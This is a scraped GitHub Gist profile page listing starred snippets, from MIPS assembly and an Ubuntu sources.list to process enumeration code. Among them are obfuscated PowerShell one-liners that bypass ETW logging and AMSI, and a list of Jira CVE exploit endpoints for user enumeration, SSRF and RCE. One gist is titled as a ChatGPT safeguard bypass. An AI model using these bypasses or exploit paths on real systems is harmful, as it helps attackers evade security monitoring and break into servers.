Skip to content

Instantly share code, notes, and snippets.

View CyberSecurityUP's full-sized avatar

Joas A Santos CyberSecurityUP

2.5k followers · 28 following
View GitHub Profile
@TheWover
TheWover / SystemProcessInformation.cpp
Last active May 3, 2024 21:57
Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Author: TheWover
//
#include <iostream>
#include <string>
#include "ntdefs.h"
bool demoSystemProcessInformation(bool full)
{
@BigCr0C
BigCr0C / common jira vulnerabilities.txt
Last active November 14, 2023 18:15
common jira vulnerabilities
=== Vulnerabilidades mais comuns no Jira ===
CVE-2019-8449 Enumeração de usuários: /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
>>==============================<<
CVE-2019-8451 SSRF: /plugins/servlet/gadgets/makeRequest?url=https://victimhost:1337@example.com
>>==============================<<
CVE-2019–11581: RCE: /secure/ContactAdministrators!default.jspa
>>==============================<<
CVE-2019-3396 RCE: POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: JIRA ...
@vipkingo1
vipkingo1 / bypass.md
Last active October 22, 2023 15:36
chatGPT bypass
@muff-in
muff-in / resources.md
Last active May 8, 2024 16:56
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active March 16, 2024 09:06
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
@Joshimuz
Joshimuz / FAQ.md
Last active January 23, 2024 09:58
@h0bbel
h0bbel / sources.list
Last active March 23, 2024 16:17
/etc/apt/sources.list for Ubuntu 18.04.1 LTS Bionic Beaver
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://us.archive.ubuntu.com/ubuntu/ bionic main restricted
# deb-src http://us.archive.ubuntu.com/ubuntu/ bionic main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://us.archive.ubuntu.com/ubuntu/ bionic-updates main restricted
# deb-src http://us.archive.ubuntu.com/ubuntu/ bionic-updates main restricted
@rickdaalhuizen90
rickdaalhuizen90 / .bashrc
Created February 12, 2017 17:20
Parrot Os bash theme for ubuntu
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
@bsouza
bsouza / Mips - Ler e imprimir inteiro
Created November 18, 2012 15:32
Programinha simples em Assembly Mips para ler e imprimir um inteiro vindo do teclado. O registrador $t7 foi utilizado como convenção entre a chamada das funções para que possa ser reutilizado em outros programas.
.text
.globl inicio
inicio:
jal le_inteiro_do_teclado # chama função para ler
la $t7, 0($v0) # carrega o inteiro lido em $t7
jal imprime_inteiro # manda imprimir o numero lido
j fim # encerra o programa